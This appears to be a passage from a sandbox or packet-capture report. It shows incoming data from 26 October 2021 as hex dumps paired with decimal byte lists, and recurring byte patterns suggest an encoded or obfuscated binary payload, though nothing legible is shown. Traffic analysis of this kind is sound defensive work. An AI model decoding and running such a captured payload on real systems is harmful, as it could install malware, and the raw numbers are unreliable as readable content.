                    2021-10-26 16:59:45 UTC3631INData Raw: 34 36 20 39 32 20 37 20 31 34 37 20 35 32 20 32 34 34 20 37 37 20 32 31 35 20 32 30 39 20 39 34 20 35 30 20 31 32 20 37 32 20 34 34 20 31 37 34 20 39 20 37 36 20 32 30 36 20 39 34 20 31 20 31 35 35 20 31 34 30 20 31 35 34 20 35 31 20 34 36 20 31 35 37 20 32 32 38 20 36 34 20 38 37 20 31 36 32 20 31 33 31 20 35 32 20 31 34 31 20 31 34 37 20 36 32 20 33 31 20 39 32 20 31 38 35 20 36 37 20 31 35 30 20 34 39 20 32 31 30 20 35 33 20 32 31 39 20 34 32 20 34 30 20 31 35 39 20 32 30 31 20 33 37 20 31 39 31 20 31 31 38 20 31 34 33 20 31 34 35 20 32 32 34 20 36 38 20 32 32 39 20 32 33 30 20 39 33 20 31 38 31 20 31 31 38 20 31 34 33 20 31 34 35 20 31 38 35 20 31 39 38 20 31 35 35 20 32 31 36 20 31 36 39 20 31 30 35 20 32 33 33 20 31 31 36 20 31 34 31 20 31 34 39 20
                    Data Ascii: 46 92 7 147 52 244 77 215 209 94 50 12 72 44 174 9 76 206 94 1 155 140 154 51 46 157 228 64 87 162 131 52 141 147 62 31 92 185 67 150 49 210 53 219 42 40 159 201 37 191 118 143 145 224 68 229 230 93 181 118 143 145 185 198 155 216 169 105 233 116 141 149
                    2021-10-26 16:59:45 UTC3635INData Raw: 20 35 33 20 31 30 34 20 31 32 35 20 31 36 31 20 38 39 20 33 35 20 32 31 32 20 32 31 34 20 38 39 20 31 36 39 20 31 36 39 20 32 30 30 20 36 36 20 36 39 20 31 30 32 20 31 33 30 20 32 34 20 39 31 20 32 30 20 32 30 35 20 32 31 34 20 32 31 36 20 32 31 35 20 33 38 20 31 39 33 20 32 31 33 20 31 37 36 20 31 31 35 20 36 33 20 31 38 39 20 31 35 34 20 37 20 31 36 20 32 32 20 32 31 34 20 38 37 20 32 32 36 20 31 39 36 20 31 36 37 20 31 33 38 20 37 30 20 39 34 20 39 38 20 31 31 34 20 31 33 37 20 32 34 37 20 39 36 20 31 34 30 20 31 33 31 20 31 30 32 20 31 34 20 32 33 37 20 36 31 20 39 33 20 32 35 35 20 39 38 20 31 33 32 20 34 32 20 32 33 20 36 35 20 34 30 20 31 39 30 20 32 30 20 31 38 30 20 31 35 33 20 31 35 32 20 31 36 31 20 32 30 33 20 31 31 33 20 31 34 33 20 31 34 35
                    Data Ascii: 53 104 125 161 89 35 212 214 89 169 169 200 66 69 102 130 24 91 20 205 214 216 215 38 193 213 176 115 63 189 154 7 16 22 214 87 226 196 167 138 70 94 98 114 137 247 96 140 131 102 14 237 61 93 255 98 132 42 23 65 40 190 20 180 153 152 161 203 113 143 145
                    2021-10-26 16:59:45 UTC3638INData Raw: 30 36 20 31 36 31 20 32 30 39 20 31 20 32 36 20 31 32 36 20 32 32 32 20 31 38 39 20 32 34 33 20 34 37 20 35 31 20 38 38 20 31 38 39 20 32 31 38 20 31 34 35 20 31 35 31 20 34 32 20 32 34 31 20 32 34 34 20 31 34 38 20 31 38 39 20 31 32 35 20 37 34 20 32 32 30 20 31 34 30 20 39 20 30 20 31 31 32 20 39 31 20 33 38 20 38 33 20 31 34 38 20 31 31 36 20 32 31 35 20 31 34 36 20 32 31 38 20 38 34 20 34 38 20 33 38 20 33 39 20 35 30 20 35 31 20 34 38 20 35 31 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 32 34 20 35 30 20 34 38 20 35 30 20 36 34 20 31 30 32 20 39 32 20 36 39 20 36 37 20 36 39 20 32 20 37 20 30 20 31 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 37 20 35 30 20 39 32 20 35 30 20 35 34 20 38 34 20 32 31 34 20 34 38 20 31 30 39 20
                    Data Ascii: 06 161 209 1 26 126 222 189 243 47 51 88 189 218 145 151 42 241 244 148 189 125 74 220 140 9 0 112 91 38 83 148 116 215 146 218 84 48 38 39 50 51 48 51 54 84 114 117 109 124 50 48 50 64 102 92 69 67 69 2 7 0 1 84 114 117 109 117 50 92 50 54 84 214 48 109
                    2021-10-26 16:59:45 UTC3642INData Raw: 37 20 31 32 31 20 31 31 35 20 31 30 39 20 31 39 37 20 35 37 20 36 35 20 35 37 20 34 38 20 38 34 20 31 38 30 20 31 32 36 20 32 38 20 31 32 33 20 35 32 20 34 38 20 32 33 37 20 36 31 20 33 37 20 31 32 31 20 31 31 35 20 31 30 39 20 31 33 30 20 35 37 20 36 35 20 35 37 20 34 38 20 38 34 20 31 31 32 20 31 32 31 20 32 38 20 31 32 33 20 35 32 20 34 38 20 33 39 20 35 38 20 31 32 34 20 31 32 36 20 31 31 35 20 31 30 39 20 35 30 20 36 32 20 32 34 20 36 32 20 34 38 20 38 34 20 33 33 20 31 32 31 20 36 39 20 31 32 34 20 35 32 20 34 38 20 38 34 20 35 38 20 31 32 34 20 31 32 36 20 31 31 35 20 31 30 39 20 36 20 36 32 20 32 34 20 36 32 20 34 38 20 38 34 20 32 34 35 20 31 32 31 20 35 32 20 31 31 32 20 35 32 20 34 38 20 31 38 38 20 35 38 20 31 33 20 31 31 34 20 31 31 35 20 31
                    Data Ascii: 7 121 115 109 197 57 65 57 48 84 180 126 28 123 52 48 237 61 37 121 115 109 130 57 65 57 48 84 112 121 28 123 52 48 39 58 124 126 115 109 50 62 24 62 48 84 33 121 69 124 52 48 84 58 124 126 115 109 6 62 24 62 48 84 245 121 52 112 52 48 188 58 13 114 115 1
                    2021-10-26 16:59:45 UTC3647INData Raw: 20 31 30 39 20 31 31 32 20 35 39 20 35 31 20 31 34 30 20 35 34 20 31 35 33 20 31 31 35 20 31 32 36 20 31 30 38 20 31 31 32 20 35 30 20 31 37 35 20 34 32 20 35 34 20 38 34 20 31 32 33 20 31 31 38 20 31 37 33 20 31 31 32 20 32 35 35 20 34 39 20 35 31 20 35 34 20 38 34 20 31 31 34 20 32 32 30 20 31 31 37 20 31 31 32 20 35 30 20 31 37 20 34 39 20 32 35 34 20 38 34 20 31 39 31 20 31 31 36 20 31 30 38 20 31 31 33 20 35 30 20 34 38 20 31 33 36 20 34 36 20 38 34 20 31 31 34 20 31 31 36 20 31 30 38 20 31 38 34 20 35 30 20 32 32 35 20 35 31 20 35 35 20 38 35 20 31 31 34 20 31 31 37 20 31 37 31 20 31 30 34 20 35 30 20 34 38 20 35 31 20 35 35 20 31 35 32 20 31 31 34 20 31 36 34 20 31 30 38 20 31 31 33 20 35 31 20 34 38 20 35 30 20 32 32 38 20 37 36 20 31 31 34 20 31
                    Data Ascii: 109 112 59 51 140 54 153 115 126 108 112 50 175 42 54 84 123 118 173 112 255 49 51 54 84 114 220 117 112 50 17 49 254 84 191 116 108 113 50 48 136 46 84 114 116 108 184 50 225 51 55 85 114 117 171 104 50 48 51 55 152 114 164 108 113 51 48 50 228 76 114 1
                    2021-10-26 16:59:45 UTC3651INData Raw: 20 31 31 34 20 31 32 38 20 32 30 31 20 32 34 37 20 35 31 20 35 34 20 33 34 20 33 39 20 32 34 31 20 38 31 20 31 31 34 20 31 30 37 20 31 31 32 20 33 31 20 31 34 39 20 31 35 33 20 35 33 20 38 32 20 31 31 34 20 36 30 20 32 30 30 20 31 38 30 20 35 30 20 35 34 20 35 30 20 38 33 20 32 34 31 20 31 30 38 20 31 31 33 20 31 30 37 20 31 31 32 20 31 37 39 20 31 34 39 20 34 34 20 35 30 20 38 32 20 31 31 34 20 32 33 32 20 32 30 30 20 32 34 37 20 35 31 20 35 34 20 35 30 20 31 34 33 20 32 34 31 20 32 34 35 20 31 31 36 20 31 30 37 20 31 31 32 20 32 33 31 20 31 34 39 20 31 38 31 20 35 35 20 38 32 20 31 31 34 20 31 33 32 20 32 30 30 20 38 37 20 35 33 20 35 34 20 35 32 20 37 31 20 36 32 20 35 31 20 31 31 32 20 35 39 20 32 34 30 20 32 33 30 20 33 38 20 38 20 34 39 20 32 20 32
                    Data Ascii: 114 128 201 247 51 54 34 39 241 81 114 107 112 31 149 153 53 82 114 60 200 180 50 54 50 83 241 108 113 107 112 179 149 44 50 82 114 232 200 247 51 54 50 143 241 245 116 107 112 231 149 181 55 82 114 132 200 87 53 54 52 71 62 51 112 59 240 230 38 8 49 2 2
                    2021-10-26 16:59:45 UTC3655INData Raw: 31 31 32 20 35 30 20 34 38 20 35 32 20 35 34 20 31 30 34 20 39 32 20 38 38 20 31 30 38 20 35 32 20 35 30 20 31 30 38 20 36 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 37 20 31 31 32 20 37 30 20 33 30 20 38 35 20 35 34 20 31 37 20 31 31 34 20 32 32 35 20 38 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 34 38 20 38 34 20 32 32 36 20 39 31 20 31 30 20 31 31 32 20 31 31 39 20 34 38 20 32 35 30 20 32 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 33 20 35 30 20 31 35 36 20 32 38 20 31 37 31 20 38 35 20 35 35 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 39 20 35 34 20 38 32 20 31 30 36 20 31 33 34 20 31 31 39 20 31 35 38 20 35 30 20 31 31 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 30 20 31 31 32 20 31 31 36 20 35
                    Data Ascii: 112 50 48 52 54 104 92 88 108 52 50 108 6 54 84 114 117 107 112 70 30 85 54 17 114 225 89 112 50 48 50 48 84 226 91 10 112 119 48 250 2 84 114 117 109 113 50 156 28 171 85 55 117 109 112 50 48 49 54 82 106 134 119 158 50 118 50 54 84 114 117 110 112 116 5
                    2021-10-26 16:59:45 UTC3659INData Raw: 32 20 31 33 38 20 31 31 30 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 30 30 20 31 30 39 20 31 34 35 20 31 32 32 20 32 33 31 20 34 38 20 37 34 20 38 34 20 36 32 20 34 32 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 33 35 20 35 34 20 32 39 20 35 39 20 32 30 37 20 31 30 39 20 31 34 20 35 30 20 37 32 20 38 32 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 32 33 20 31 31 32 20 31 35 35 20 31 32 31 20 31 33 36 20 35 34 20 34 33 20 31 31 34 20 38 39 20 31 32 20 31 31 32 20 35 30 20 34 38 20 35 30 20 33 39 20 38 34 20 31 33 35 20 36 30 20 31 37 38 20 31 31 34 20 31 37 38 20 34 38 20 37 34 20 38 37 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 32 20 35 30 20 31 30 39 20 31 32 30 20 32 33 33 20 38 36 20 32 34 30 20 31 31 37 20 36 35 20 31 38 20 35 30 20
                    Data Ascii: 2 138 110 50 54 84 114 100 109 145 122 231 48 74 84 62 42 109 112 50 48 35 54 29 59 207 109 14 50 72 82 54 84 114 117 123 112 155 121 136 54 43 114 89 12 112 50 48 50 39 84 135 60 178 114 178 48 74 87 84 114 117 109 102 50 109 120 233 86 240 117 65 18 50
                    2021-10-26 16:59:45 UTC3663INData Raw: 20 31 36 33 20 34 38 20 32 33 20 38 31 20 31 31 34 20 31 31 38 20 31 33 38 20 31 30 39 20 31 34 30 20 37 33 20 34 38 20 35 30 20 36 32 20 38 34 20 32 32 35 20 31 31 37 20 31 33 36 20 32 33 20 32 39 20 35 32 20 34 38 20 35 35 20 38 34 20 32 34 30 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 38 32 20 34 32 20 31 39 37 20 37 38 20 37 35 20 31 31 33 20 31 31 30 20 31 31 33 20 36 20 31 37 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 32 34 33 20 31 30 39 20 31 37 37 20 39 30 20 31 31 32 20 35 34 20 35 30 20 38 35 20 33 34 20 32 34 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 31 38 30 20 35 34 20 31 36 35 20 32 36 20 35 31 20 31 30 35 20 31 31 36 20 35 31 20 31 36 30 20 31 37 36 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 32 33 35 20 31 31 32 20 31 39
                    Data Ascii: 163 48 23 81 114 118 138 109 140 73 48 50 62 84 225 117 136 23 29 52 48 55 84 240 117 109 112 50 182 42 197 78 75 113 110 113 6 178 50 54 84 114 243 109 177 90 112 54 50 85 34 247 109 112 50 48 180 54 165 26 51 105 116 51 160 176 54 84 114 117 235 112 19
                    2021-10-26 16:59:45 UTC3667INData Raw: 20 31 31 37 20 31 30 39 20 31 30 32 20 35 30 20 36 39 20 31 37 38 20 31 30 20 38 36 20 37 31 20 31 31 36 20 31 33 20 32 31 36 20 35 30 20 34 38 20 35 30 20 35 34 20 36 36 20 31 31 34 20 32 30 38 20 32 33 37 20 37 36 20 34 38 20 35 20 35 31 20 32 34 36 20 32 35 32 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 33 35 20 34 38 20 32 33 31 20 31 38 32 20 31 31 33 20 31 31 39 20 36 34 20 31 30 38 20 31 32 34 20 31 35 35 20 34 38 20 35 30 20 35 34 20 38 34 20 39 39 20 31 31 37 20 31 30 34 20 32 34 31 20 32 35 20 35 33 20 37 20 35 35 20 31 36 20 32 31 39 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 33 38 20 35 30 20 38 33 20 32 31 33 20 36 34 20 31 31 32 20 39 31 20 31 31 33 20 31 39 30 20 31 35 33 20 35 30 20 35 34 20 38 34 20 31 31 34 20 39 39 20 31 30
                    Data Ascii: 117 109 102 50 69 178 10 86 71 116 13 216 50 48 50 54 66 114 208 237 76 48 5 51 246 252 114 117 109 112 35 48 231 182 113 119 64 108 124 155 48 50 54 84 99 117 104 241 25 53 7 55 16 219 117 109 112 50 38 50 83 213 64 112 91 113 190 153 50 54 84 114 99 10
                    2021-10-26 16:59:45 UTC3670INData Raw: 31 34 20 32 39 20 32 34 38 20 32 33 20 35 30 20 38 33 20 35 31 20 31 35 34 20 32 32 35 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 32 20 34 38 20 31 38 32 20 31 36 33 20 31 31 35 20 31 31 35 20 32 32 20 31 30 38 20 30 20 31 33 32 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 35 20 31 31 37 20 31 38 31 20 32 32 39 20 32 31 20 34 39 20 38 37 20 35 35 20 32 34 20 31 39 37 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 31 38 20 31 39 34 20 35 30 20 31 31 35 20 31 30 20 31 31 33 20 35 30 20 31 33 36 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 36 20 31 30 39 20 31 38 30 20 31 36 34 20 31 32 32 20 35 32 20 39 32 20 38 35 20 31 37 30 20 32 30 35 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 31 20 35 34 20 37 36 20 32 32 39 20
                    Data Ascii: 14 29 248 23 50 83 51 154 225 114 117 109 112 52 48 182 163 115 115 22 108 0 132 48 50 54 84 115 117 181 229 21 49 87 55 24 197 117 109 112 50 49 50 118 194 50 115 10 113 50 136 50 54 84 114 116 109 180 164 122 52 92 85 170 205 109 112 50 48 51 54 76 229
                    2021-10-26 16:59:45 UTC3674INData Raw: 34 20 38 35 20 31 31 34 20 31 33 20 36 34 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 33 34 20 31 32 31 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 35 34 20 33 30 20 35 30 20 35 34 20 38 35 20 31 31 34 20 34 35 20 36 37 20 31 31 32 20 35 30 20 34 39 20 35 30 20 32 35 34 20 31 32 32 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 32 31 34 20 33 30 20 35 30 20 35 34 20 38 36 20 31 31 34 20 31 31 37 20 36 36 20 31 31 32 20 35 30 20 34 39 20 35 30 20 34 32 20 31 32 33 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 32 20 31 30 20 33 31 20 35 30 20 35 34 20 38 37 20 31 31 34 20 32 39 20 36 36 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 37 34 20 31 32 33 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 32 35 30 20 33 31 20 35 30 20 35 34 20 38 35 20
                    Data Ascii: 4 85 114 13 64 112 50 49 50 134 121 114 117 108 112 54 30 50 54 85 114 45 67 112 50 49 50 254 122 114 117 108 112 214 30 50 54 86 114 117 66 112 50 49 50 42 123 114 117 111 112 10 31 50 54 87 114 29 66 112 50 49 50 174 123 114 117 108 112 250 31 50 54 85
                    2021-10-26 16:59:45 UTC3679INData Raw: 20 35 34 20 38 35 20 31 31 34 20 32 30 38 20 30 20 31 31 32 20 35 30 20 34 39 20 35 30 20 32 33 20 35 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 39 35 20 39 34 20 35 30 20 35 34 20 38 36 20 31 31 34 20 32 35 32 20 33 20 31 31 32 20 35 30 20 35 31 20 35 30 20 31 34 37 20 35 38 20 31 31 34 20 31 31 37 20 31 30 35 20 31 31 32 20 32 34 33 20 39 34 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 32 30 20 32 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 31 31 20 35 39 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 31 32 37 20 36 34 20 35 30 20 35 34 20 38 35 20 31 31 34 20 32 34 30 20 32 39 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 35 31 20 33 36 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 32 20 31 34 33 20 36 34 20 35 30 20 35 34 20 38 35 20 31
                    Data Ascii: 54 85 114 208 0 112 50 49 50 23 58 114 117 108 112 95 94 50 54 86 114 252 3 112 50 51 50 147 58 114 117 105 112 243 94 50 54 85 114 120 2 112 50 49 50 111 59 114 117 108 112 127 64 50 54 85 114 240 29 112 50 49 50 151 36 114 117 111 112 143 64 50 54 85 1
                    2021-10-26 16:59:45 UTC3683INData Raw: 34 20 31 32 20 31 30 38 20 31 33 31 20 34 30 20 31 30 37 20 35 33 20 31 37 35 20 38 34 20 32 32 37 20 38 34 20 31 33 37 20 31 31 32 20 31 37 31 20 34 38 20 31 37 33 20 32 33 20 31 37 36 20 31 31 34 20 32 33 36 20 31 30 39 20 31 39 34 20 31 39 20 32 31 37 20 35 30 20 31 35 39 20 38 34 20 34 39 20 38 32 20 38 34 20 31 31 33 20 31 35 35 20 34 38 20 39 39 20 31 37 20 38 31 20 31 31 35 20 32 32 30 20 31 30 39 20 37 20 32 31 20 31 33 20 35 31 20 31 35 39 20 38 34 20 32 33 36 20 38 32 20 31 30 20 31 31 32 20 31 34 37 20 35 31 20 31 39 33 20 34 34 20 35 31 20 31 31 34 20 32 32 30 20 31 30 39 20 32 31 37 20 32 31 20 31 31 34 20 35 31 20 31 35 39 20 38 34 20 31 32 30 20 39 33 20 31 30 34 20 31 31 33 20 31 35 35 20 34 38 20 31 20 33 30 20 35 31 20 31 31 34 20 32 30
                    Data Ascii: 4 12 108 131 40 107 53 175 84 227 84 137 112 171 48 173 23 176 114 236 109 194 19 217 50 159 84 49 82 84 113 155 48 99 17 81 115 220 109 7 21 13 51 159 84 236 82 10 112 147 51 193 44 51 114 220 109 217 21 114 51 159 84 120 93 104 113 155 48 1 30 51 114 20
                    2021-10-26 16:59:45 UTC3687INData Raw: 20 35 30 20 36 33 20 38 36 20 38 35 20 32 31 37 20 31 33 35 20 31 32 34 20 31 32 36 20 34 38 20 31 39 33 20 34 34 20 35 31 20 31 31 34 20 32 31 32 20 31 31 31 20 31 34 31 20 31 35 33 20 31 36 30 20 34 38 20 31 35 31 20 38 36 20 37 31 20 32 31 37 20 31 35 30 20 31 32 34 20 32 31 39 20 35 30 20 31 32 20 31 35 34 20 32 34 38 20 31 31 32 20 35 37 20 31 30 39 20 34 32 20 31 35 38 20 36 32 20 35 36 20 32 31 35 20 38 36 20 31 32 39 20 31 31 31 20 34 20 31 31 38 20 31 37 39 20 35 30 20 31 39 33 20 34 34 20 31 30 39 20 31 31 38 20 32 34 34 20 31 31 31 20 31 38 20 31 35 38 20 31 37 32 20 35 30 20 31 38 33 20 38 36 20 33 30 20 32 31 37 20 33 39 20 31 31 36 20 31 33 31 20 35 31 20 36 38 20 31 35 34 20 37 32 20 31 32 37 20 31 35 36 20 31 30 39 20 32 35 31 20 31 35 38
                    Data Ascii: 50 63 86 85 217 135 124 126 48 193 44 51 114 212 111 141 153 160 48 151 86 71 217 150 124 219 50 12 154 248 112 57 109 42 158 62 56 215 86 129 111 4 118 179 50 193 44 109 118 244 111 18 158 172 50 183 86 30 217 39 116 131 51 68 154 72 127 156 109 251 158
                    2021-10-26 16:59:45 UTC3691INData Raw: 36 20 31 39 32 20 32 32 33 20 31 38 37 20 39 38 20 32 30 33 20 34 39 20 31 39 32 20 31 33 34 20 32 30 30 20 31 31 34 20 31 34 30 20 31 30 38 20 31 34 30 20 31 33 30 20 31 37 32 20 35 30 20 31 39 39 20 38 35 20 31 31 37 20 31 39 36 20 32 34 31 20 31 31 32 20 31 39 35 20 34 39 20 36 33 20 31 33 35 20 32 30 30 20 31 31 34 20 31 33 32 20 31 30 38 20 31 33 30 20 31 33 30 20 31 37 32 20 35 30 20 31 39 39 20 38 35 20 31 34 32 20 31 39 37 20 32 34 31 20 31 31 32 20 32 31 31 20 35 30 20 31 33 32 20 31 35 39 20 31 37 30 20 31 32 32 20 31 34 38 20 31 31 31 20 39 39 20 31 33 31 20 35 35 20 35 34 20 31 37 35 20 38 36 20 31 32 39 20 31 31 31 20 31 38 32 20 39 38 20 31 37 31 20 35 30 20 31 32 38 20 31 35 36 20 35 33 20 31 31 36 20 32 34 34 20 31 31 31 20 31 30 39 20 31
                    Data Ascii: 6 192 223 187 98 203 49 192 134 200 114 140 108 140 130 172 50 199 85 117 196 241 112 195 49 63 135 200 114 132 108 130 130 172 50 199 85 142 197 241 112 211 50 132 159 170 122 148 111 99 131 55 54 175 86 129 111 182 98 171 50 128 156 53 116 244 111 109 1
                    2021-10-26 16:59:45 UTC3707INData Raw: 35 30 20 31 31 35 20 39 33 20 39 31 20 33 36 20 32 37 20 32 35 20 38 20 32 20 31 31 37 20 38 35 20 39 32 20 38 33 20 33 38 20 31 39 20 31 20 38 20 32 30 20 31 31 35 20 36 38 20 37 30 20 36 38 20 36 31 20 31 36 20 30 20 32 35 20 32 31 20 35 30 20 39 38 20 37 31 20 38 38 20 33 32 20 32 37 20 32 34 20 38 20 35 31 20 39 33 20 39 33 20 36 36 20 38 37 20 33 32 20 32 37 20 32 33 20 34 20 32 38 20 39 31 20 36 38 20 37 35 20 31 31 39 20 33 32 20 36 20 37 20 34 20 31 38 20 37 31 20 36 38 20 38 37 20 35 34 20 36 20 37 20 32 37 20 32 35 20 32 35 20 39 35 20 38 35 20 31 32 32 20 38 33 20 35 36 20 32 20 31 36 20 33 31 20 33 20 35 30 20 39 39 20 37 31 20 37 30 20 33 36 20 30 20 31 36 20 33 30 20 33 20 31 32 33 20 39 32 20 38 36 20 38 37 20 33 39 20 33 31 20 35 32 20 32
                    Data Ascii: 50 115 93 91 36 27 25 8 2 117 85 92 83 38 19 1 8 20 115 68 70 68 61 16 0 25 21 50 98 71 88 32 27 24 8 51 93 93 66 87 32 27 23 4 28 91 68 75 119 32 6 7 4 18 71 68 87 54 6 7 27 25 25 95 85 122 83 56 2 16 31 3 50 99 71 70 36 0 16 30 3 123 92 86 87 39 31 52 2
                    2021-10-26 16:59:45 UTC3719INData Raw: 37 20 31 31 20 33 37 20 35 31 20 35 36 20 38 39 20 34 32 20 31 32 30 20 33 20 38 33 20 31 31 34 20 33 35 20 34 38 20 32 34 20 35 30 20 31 37 20 31 20 31 32 31 20 38 39 20 37 31 20 32 38 20 31 30 20 35 37 20 30 20 32 36 20 38 36 20 31 32 33 20 37 32 20 31 32 36 20 32 39 20 33 35 20 32 33 20 34 33 20 32 31 20 31 31 39 20 39 20 37 30 20 39 34 20 32 34 20 35 38 20 30 20 32 31 20 36 36 20 39 33 20 36 20 38 35 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 35 32 20 31 32 30 20 34 20 37 35 20 31 30 31 20 39 39 20 32 30 20 35 34 20 34 31 20 32 32 20 31 32 33 20 38 39 20 31 31 39 20 39 36 20 31 38 20 32 35 20 32 20 32 30 20 35 33 20 31 31 39 20 36 20 31 31 37 20 35 20 31 31 32 20 38 36 20 36 36 20 39 34 20 35 36 20 36 39 20 39 38 20 38 35 20 37 39 20 31 30 32 20
                    Data Ascii: 7 11 37 51 56 89 42 120 3 83 114 35 48 24 50 17 1 121 89 71 28 10 57 0 26 86 123 72 126 29 35 23 43 21 119 9 70 94 24 58 0 21 66 93 6 85 11 84 81 72 28 52 120 4 75 101 99 20 54 41 22 123 89 119 96 18 25 2 20 53 119 6 117 5 112 86 66 94 56 69 98 85 79 102
                    2021-10-26 16:59:45 UTC3735INData Raw: 20 36 35 20 38 39 20 36 38 20 33 37 20 34 39 20 34 32 20 36 20 36 30 20 31 31 38 20 30 20 31 32 33 20 31 38 20 34 36 20 36 31 20 31 38 20 31 31 20 31 20 31 31 38 20 32 30 20 38 33 20 31 31 33 20 35 33 20 35 31 20 37 32 20 38 30 20 31 31 32 20 31 37 20 31 33 20 36 37 20 31 30 31 20 31 30 38 20 33 20 36 38 20 34 33 20 39 20 31 32 30 20 36 37 20 39 32 20 34 20 31 31 20 37 20 33 30 20 33 38 20 32 34 20 37 20 31 32 37 20 31 32 34 20 31 31 36 20 32 31 20 33 38 20 31 38 20 38 30 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 35 31 20 36 38 20 36 38 20 33 32 20 31 37 20 31 30 30 20 38 39 20 31 32 33 20 36 36 20 31 30 33 20 35 35 20 37 20 34 37 20 32 36 20 37 31 20 31 31 33 20 32 20 31 32 30 20 31 30 39 20 34 32 20 37 20 32 36 20 37 37 20 31 35 20 34 38 20 31 37
                    Data Ascii: 65 89 68 37 49 42 6 60 118 0 123 18 46 61 18 11 1 118 20 83 113 53 51 72 80 112 17 13 67 101 108 3 68 43 9 120 67 92 4 11 7 30 38 24 7 127 124 116 21 38 18 80 77 50 19 15 71 51 68 68 32 17 100 89 123 66 103 55 7 47 26 71 113 2 120 109 42 7 26 77 15 48 17
                    2021-10-26 16:59:45 UTC3751INData Raw: 20 37 20 36 36 20 36 20 31 31 20 32 38 20 31 34 20 32 31 20 38 30 20 31 32 37 20 34 20 39 39 20 36 33 20 33 35 20 31 38 20 31 32 20 37 32 20 39 37 20 38 32 20 31 30 36 20 36 38 20 35 38 20 32 31 20 32 20 38 38 20 34 31 20 39 31 20 38 37 20 38 34 20 31 32 32 20 30 20 33 38 20 33 35 20 33 39 20 31 20 39 39 20 37 33 20 33 20 37 31 20 32 39 20 37 39 20 31 31 37 20 37 38 20 37 37 20 36 37 20 39 33 20 31 30 32 20 37 38 20 31 39 20 32 37 20 35 36 20 34 34 20 36 34 20 37 20 39 32 20 31 30 32 20 31 31 35 20 33 32 20 32 39 20 33 37 20 36 31 20 33 38 20 34 20 39 38 20 31 31 36 20 31 32 31 20 36 31 20 32 36 20 36 35 20 34 31 20 34 31 20 39 37 20 30 20 37 31 20 37 38 20 33 38 20 31 30 20 33 37 20 33 34 20 36 38 20 36 38 20 31 31 33 20 33 20 31 32 36 20 31 30 32 20 32
                    Data Ascii: 7 66 6 11 28 14 21 80 127 4 99 63 35 18 12 72 97 82 106 68 58 21 2 88 41 91 87 84 122 0 38 35 39 1 99 73 3 71 29 79 117 78 77 67 93 102 78 19 27 56 44 64 7 92 102 115 32 29 37 61 38 4 98 116 121 61 26 65 41 41 97 0 71 78 38 10 37 34 68 68 113 3 126 102 2
                    2021-10-26 16:59:45 UTC3767INData Raw: 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 35 36 20 37 20 32 33 20 34 31 20 36 35 20 31 30 30 20 39 38 20 31 32 35 20 32 31 20 35 20 33 33 20 37 33 20 35 20 38 30 20 37 34 20 31 30 39 20 38 37 20 33 37 20 37 35 20 37 36 20 30 20 37 20 31 35 20 31 33 20 35 30 20 32 31 20 31 30 35 20 33 20 34 20 32 34 20 35 34 20 31 32 37 20 38 39 20 37 20 39 37 20 35 33 20 38 36 20 32 20 38 35 20 31 37 20 31 32 34 20 39 20 31 31 37 20 31 31 33 20 35 36 20 36 30 20 36 35 20 33 37 20 36 35 20 39 39 20 31 33 20 31 35 20 35 34 20 31 31 39 20 37 39 20 34 20 38 20 36 34 20 39 35 20 31 30 35 20 32 32 20 31 30 30 20 31 31 20 30 20 35 35 20 33 30 20 33 32 20 31 32 33 20 31 30 36 20 31 30 34 20 36 34 20 31 30 33 20 32 36 20 33 37 20 33 33 20 33 35 20 36 20 38 37 20 31 35 20 31 31
                    Data Ascii: 15 48 17 11 37 56 7 23 41 65 100 98 125 21 5 33 73 5 80 74 109 87 37 75 76 0 7 15 13 50 21 105 3 4 24 54 127 89 7 97 53 86 2 85 17 124 9 117 113 56 60 65 37 65 99 13 15 54 119 79 4 8 64 95 105 22 100 11 0 55 30 32 123 106 104 64 103 26 37 33 35 6 87 15 11
